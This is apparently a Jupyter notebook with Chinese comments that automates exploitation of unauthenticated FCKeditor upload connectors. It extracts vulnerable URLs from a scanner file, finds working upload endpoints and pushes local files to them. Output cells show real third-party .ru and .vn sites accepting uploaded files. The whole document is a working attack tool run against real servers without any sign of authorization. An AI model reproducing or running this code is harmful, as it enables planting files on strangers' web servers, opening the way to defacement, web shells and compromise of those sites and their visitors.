In [19]:
import os
import requests
from bs4 import BeautifulSoup
from pathlib import Path
import re
from typing import List

urlparam={
    #http://spanishrestaurant.ru/fckeditor/editor/filemanager/upload/test.html
    'default/connectors/test.html':{
        'param':'Command=FileUpload&Type=File&CurrentFolder=%2F'
    },
    'filemanager/connectors/test.html':{
        'param':'Command=FileUpload&Type=File&CurrentFolder=%2F',
    },
    'connectors/uploadtest.html':{
        'param':'time={timestamp}&CurrentFolder=%2F',
    },
    'upload/test.html':{
        'param':None,
    },

}

def upload_file(url: str, file_pa: str, timeout: int = 60) -> List[str]:
    """向指定上传端点提交文件。成功返回 OnUploadCompleted 的参数列表，否则抛异常。"""
    file_name = os.path.basename(file_pa)
    # 构建必要的请求头，模拟浏览器行为
    base_url = "/".join(url.split("/")[:-1])  # 获取基础 URL 用作 Referer
    headers = {
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7",
        "Accept-Language": "zh-CN,zh;q=0.9",
        "Accept-Encoding": "gzip, deflate",
        "Cache-Control": "no-cache",
        "Pragma": "no-cache",
        "Referer": f"{base_url}/uploadtest.html",  # 重要：服务器检查 Referer
        "Origin": "/".join(url.split("/")[:3]),  # 获取域名作为 Origin
        "Upgrade-Insecure-Requests": "1",
        "Connection": "keep-alive",
    }

    with open(file_pa, "rb") as f:
        files = {"NewFile": (file_name, f, "application/octet-stream")}
        resp = requests.post(url, files=files, headers=headers, timeout=timeout)
        print(f"上传文件: {url}, {resp.status_code}, {len(resp.text)} chars")
        print(f"响应内容: {resp.text}")
    
    if resp.status_code == 200 and resp.text:
        parsed = parse_onupload_list(resp.text)
        if parsed and parsed[0] == '0':
            return parsed
        raise Exception(f"上传失败: {resp.status_code},{resp.text}")
    raise Exception(f"上传失败: {resp.status_code},{resp.text}")

def get_upload_url(url):
    try:
        response = requests.get(url)
        soup = BeautifulSoup(response.text, "lxml")
        params=None
        for key,value in urlparam.items():
            if(key in url):
                params=value['param']
                break
        for select in soup.find_all("select"):
            for option in select.find_all("option"):
                option_value=option.get("value")
                if("upload" in option_value or "connectors" in option_value):
                    #这里url 需要把最后的 一节换成 option_value
                    upload_url=url.replace(url.split('/')[-1],option_value)
                    if(params is not None):
                        upload_url=upload_url+"?"+params
                    try:
                        upload_file(upload_url,'/Users/dli/mev/upload/hi')
                        return upload_url
                    except Exception as e:
                        continue
    except Exception as e:
        print(e)
    return None

def parse_onupload_list(text: str) -> List[str]:
    m = re.search(r"OnUploadCompleted\s*\((.*?)\)", text, flags=re.S | re.I)
    if not m:
        return []
    arg_str = m.group(1).strip()

    args = []
    buf = []
    in_str = False
    quote = None
    esc = False

    for ch in arg_str:
        if in_str:
            if esc:
                buf.append(ch)
                esc = False
            elif ch == "\\":
                esc = True
                buf.append(ch)
            elif ch == quote:
                in_str = False
                buf.append(ch)
            else:
                buf.append(ch)
        else:
            if ch in ("'", '"'):
                in_str = True
                quote = ch
                buf.append(ch)
            elif ch == ',':
                arg = ''.join(buf).strip()
                if arg:
                    if len(arg) >= 2 and arg[0] in '"\'' and arg[-1] == arg[0]:
                        # 去掉引号并处理转义
                        val = bytes(arg[1:-1], 'utf-8').decode('unicode_escape')
                        args.append(val)
                    else:
                        args.append(arg)
                buf = []
            else:
                buf.append(ch)

    if buf:
        arg = ''.join(buf).strip()
        if len(arg) >= 2 and arg[0] in '"\'' and arg[-1] == arg[0]:
            val = bytes(arg[1:-1], 'utf-8').decode('unicode_escape')
            args.append(val)
        elif arg:
            args.append(arg)

    return args




In [10]:

urls=Path("/Users/dli/mev/upload/vulurls_dedup.txt")
upload_urls=[]
for url in urls.read_text().splitlines():
    print(url)
    upload_url=get_upload_url(url)
    if(upload_url is not None):
        upload_urls.append(upload_url)
print(upload_urls)



http://thuvientinhgialai.vn/fckeditor/editor/filemanager/connectors/uploadtest.html
http://thuvientinhgialai.vn/fckeditor/editor/filemanager/connectors/asp/upload.asp?time={timestamp}&CurrentFolder=%2F
<script type="text/javascript">(function(){var d=document.domain;while (true){try{var A=window.parent.document.domain;break;}catch(e) {};d=d.replace(/.*?(?:\.|$)/,'');if (d.length==0) break;try{document.domain=d;}catch (e){break;}}})();window.parent.OnUploadCompleted(1,"","","This file uploader is disabled. Please check the \"editor/filemanager/connectors/asp/config.asp\" file") ;</script>
http://thuvientinhgialai.vn/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?time={timestamp}&CurrentFolder=%2F
<script type="text/javascript">(function(){var d=document.domain;while (true){try{var A=window.top.opener.document.domain;break;}catch(e) {};d=d.replace(/.*?(?:\.|$)/,'');if (d.length==0) break;try{document.domain=d;}catch (e){break;}}})();window.parent.OnUploadCompleted(1,'','','Inva

In [20]:
upload_file('http://thuvientinhgialai.vn/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?time=1755421463564&Type=File','/Users/dli/mev/upload/hi')

上传文件: http://thuvientinhgialai.vn/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?time=1755421463564&Type=File, 200, 296 chars
响应内容: <script type="text/javascript">(function(){var d=document.domain;while (true){try{var A=window.top.opener.document.domain;break;}catch(e) {};d=d.replace(/.*?(?:\.|$)/,'');if (d.length==0) break;try{document.domain=d;}catch (e){break;}}})();window.parent.OnUploadCompleted(202,'','','') ;</script>


Exception: 上传失败: 200,<script type="text/javascript">(function(){var d=document.domain;while (true){try{var A=window.top.opener.document.domain;break;}catch(e) {};d=d.replace(/.*?(?:\.|$)/,'');if (d.length==0) break;try{document.domain=d;}catch (e){break;}}})();window.parent.OnUploadCompleted(202,'','','') ;</script>

In [ ]:
len(upload_urls)
# 获取upload 文件夹 所有文件
upload_folder = Path("/Users/dli/mev/upload/upload")
upload_files = upload_folder.glob("*")
for file in upload_files:
    for url in upload_urls:
       try:
           res= upload_file(url,file)
           print(f"{file}-{url} 上传结果: {res}")
       except Exception as e:
           print(f"{file}-{url} {e}")

['0', '/images/tmp/1754659878_1_copy_9.xml', '1_copy_9.xml', '']
/Users/dli/mev/upload/upload/1 copy 9.xml-http://witch-you.ru/fckeditor/editor/filemanager/upload/php/upload.php 上传结果: ['0', '/images/tmp/1754659878_1_copy_9.xml', '1_copy_9.xml', '']
['0', '/images/tmp/1754659879_1_copy_9.xml', '1_copy_9.xml', '']
/Users/dli/mev/upload/upload/1 copy 9.xml-http://egorovatatiana.ru/fckeditor/editor/filemanager/upload/php/upload.php 上传结果: ['0', '/images/tmp/1754659879_1_copy_9.xml', '1_copy_9.xml', '']
['0', '/images/tmp/1754659881_1_copy_9.xml', '1_copy_9.xml', '']
/Users/dli/mev/upload/upload/1 copy 9.xml-http://fa-na-t.ru/fckeditor/editor/filemanager/upload/php/upload.php 上传结果: ['0', '/images/tmp/1754659881_1_copy_9.xml', '1_copy_9.xml', '']
['0', '/images/tmp/1754659883_1_copy_9.xml', '1_copy_9.xml', '']
/Users/dli/mev/upload/upload/1 copy 9.xml-http://triinochka.ru/fckeditor/editor/filemanager/upload/php/upload.php 上传结果: ['0', '/images/tmp/1754659883_1_copy_9.xml', '1_copy_9.xml', '']


KeyboardInterrupt: 

In [ ]:
# 上传本地文件到指定 FCKeditor 连接器 URL（字段名为 NewFile）


# from IPython.display import HTML, display

# # url="http://qtttc.edu.vn/fckeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=FileUpload&Type=File&CurrentFolder=%2F"
# # url='http://spanishrestaurant.ru/fckeditor/editor/filemanager/upload/php/upload.php'
# url=  'http://expocenter.sk/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?time=1754651682295&Type=File&CurrentFolder=%2F'
# # 修改为你要上传的本地文件路径
# file_path = "/Users/dli/mev/upload/hi"  # 例子：/Users/dli/mev/upload/yourfile.txt

# print(upload_file(url, file_path))
 


In [ ]:
# response = requests.get(url[1])
# print(response.text)
# HTML(response.text)

In [ ]:
# 获取所有 <option>（不依赖已知 id/name）
# import sys, json

# try:
#     from bs4 import BeautifulSoup
# except Exception:
#     import subprocess
#     subprocess.check_call([sys.executable, "-m", "pip", "install", "-q", "beautifulsoup4", "lxml"])  # 兜底安装
#     from bs4 import BeautifulSoup

# soup = BeautifulSoup(response.text, "lxml")  # 可改为 "html.parser"

# options = []
# for s_idx, sel in enumerate(soup.find_all("select")):
#     for o_idx, opt in enumerate(sel.find_all("option")):
#         text = opt.get_text(strip=True)
#         raw_value = opt.get("value")
#         value = raw_value if raw_value is not None else text  # 无 value 属性时以文本为值
#         options.append({
#             "select_index": s_idx,
#             "select_id": sel.get("id"),
#             "select_name": sel.get("name"),
#             "option_index": o_idx,
#             "value": value,
#             "text": text,
#             "selected": opt.has_attr("selected"),
#         })

# print(json.dumps(options, ensure_ascii=False, indent=2))


In [ ]:
# 从 url.txt 提取 Vulurl，去重后写入新文件
import re, os
from pathlib import Path

src_path = Path("/Users/dli/mev/upload/url.txt")
out_path = Path("/Users/dli/mev/upload/vulurls_dedup.txt")

if not src_path.is_file():
    raise FileNotFoundError(f"找不到源文件: {src_path}")

text = src_path.read_text(encoding="utf-8", errors="ignore")
# 提取以 "Vulurl:" 开头后的 URL（非空白连续串）
urls = re.findall(r"(?im)^\s*Vulurl:\s*(\S+)", text)

# 按出现顺序去重
seen = set()
dedup_urls = []
for u in urls:
    u = u.strip()
    if not u:
        continue
    if u not in seen:
        seen.add(u)
        dedup_urls.append(u)

# 写入新文件（每行一个 URL）
out_path.write_text("\n".join(dedup_urls) + "\n", encoding="utf-8")

print(f"提取总数: {len(urls)}，去重后: {len(dedup_urls)}")
print(f"输出文件: {out_path}")
print("示例前5条:")
for x in dedup_urls[:5]:
    print(" ", x)


In [ ]:
# from pathlib import Path
# import hashlib
# import requests


# urls=Path("/Users/dli/mev/upload/vulurls_dedup.txt")
# hash_dict={}
# for url in urls.read_text().splitlines():
#     try:
#         response1 = requests.get(url)
#         hash1=hashlib.md5(response1.text.encode()).hexdigest()
#         hash_dict[url]=hash1
#     except Exception as e:
#         print(e)
#         continue

# print(f'len(hash_dict):{len(hash_dict)},after dedup:{len(set(hash_dict.values()))}')

In [ ]:
# dict_hash={}
# for i in hash_dict:
#     dict_hash[hash_dict[i]]=i
# print(dict_hash)
